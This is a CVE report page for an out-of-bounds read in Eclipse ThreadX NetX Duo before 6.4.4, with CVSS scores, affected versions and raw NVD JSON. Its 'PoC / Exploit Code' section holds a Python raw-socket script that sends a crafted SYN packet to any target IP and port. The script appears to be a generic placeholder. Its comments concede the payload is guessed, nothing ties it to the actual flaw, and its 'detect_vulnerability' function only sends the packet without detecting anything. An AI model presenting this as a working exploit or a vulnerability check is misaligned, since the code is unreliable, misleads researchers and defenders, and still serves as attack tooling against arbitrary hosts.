Security Vulnerability Report
中文
CVE-2025-55083 CVSS 5.3 MEDIUM

CVE-2025-55083

Published: 2025-10-15 15:16:04
Last Modified: 2025-10-21 17:04:27
Source: [email protected]

Description

In NetX Duo version before 6.4.4, the component of Eclipse Foundation ThreadX, there was an incorrect bound check resulting it out by two out of bound read.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:* - VULNERABLE
Eclipse ThreadX NetX Duo < 6.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-55083 PoC - NetX Duo Out-of-Bounds Read # This PoC demonstrates the concept of triggering an out-of-bounds read # in NetX Duo versions before 6.4.4 by sending a crafted network packet. import socket import struct def craft_malicious_packet(target_ip, target_port): """ Craft a malicious network packet designed to trigger the out-of-bounds read vulnerability in NetX Duo < 6.4.4. The vulnerability is caused by incorrect bound check resulting in a read that is out by two bytes. """ # Create a raw socket (requires root/admin privileges) try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) except PermissionError: print("[!] Raw socket requires root/admin privileges") return # Construct a packet with manipulated length field to trigger OOB read # The key is to set packet parameters that bypass the incorrect bound check # TCP Header (simplified) src_port = 12345 dst_port = target_port seq_num = 0 ack_num = 0 data_offset = 5 # 20 bytes (no options) flags = 0x02 # SYN flag window = 65535 checksum = 0 urgent = 0 # Build TCP header tcp_header = struct.pack('!HHIIBBHHH', src_port, dst_port, seq_num, ack_num, (data_offset << 4), flags, window, checksum, urgent) # Payload designed to trigger the 2-byte out-of-bounds read # The specific payload depends on which protocol parser is targeted malicious_payload = b'\x00' * 64 # Adjust size to trigger OOB # Send the packet packet = tcp_header + malicious_payload sock.sendto(packet, (target_ip, target_port)) print(f"[*] Malicious packet sent to {target_ip}:{target_port}") sock.close() def detect_vulnerability(target_ip, target_port): """ Detect if the target is running a vulnerable version of NetX Duo. """ print(f"[*] Testing {target_ip}:{target_port} for CVE-2025-55083") print("[*] Vulnerable versions: NetX Duo < 6.4.4") craft_malicious_packet(target_ip, target_port) if __name__ == "__main__": import sys if len(sys.argv) >= 3: target_ip = sys.argv[1] target_port = int(sys.argv[2]) detect_vulnerability(target_ip, target_port) else: print("Usage: python poc.py <target_ip> <target_port>") print("Note: Requires root/admin privileges for raw socket access")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55083", "sourceIdentifier": "[email protected]", "published": "2025-10-15T15:16:04.217", "lastModified": "2025-10-21T17:04:27.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In NetX Duo version before 6.4.4, the component of Eclipse Foundation ThreadX, there was an incorrect bound check resulting it out by two out of bound read."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_netx_duo:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.4.202503", "matchCriteriaId": "24743F34-C00F-4CB2-BCEE-2BB29FA265CB"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-9hw5-4xcv-jprm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.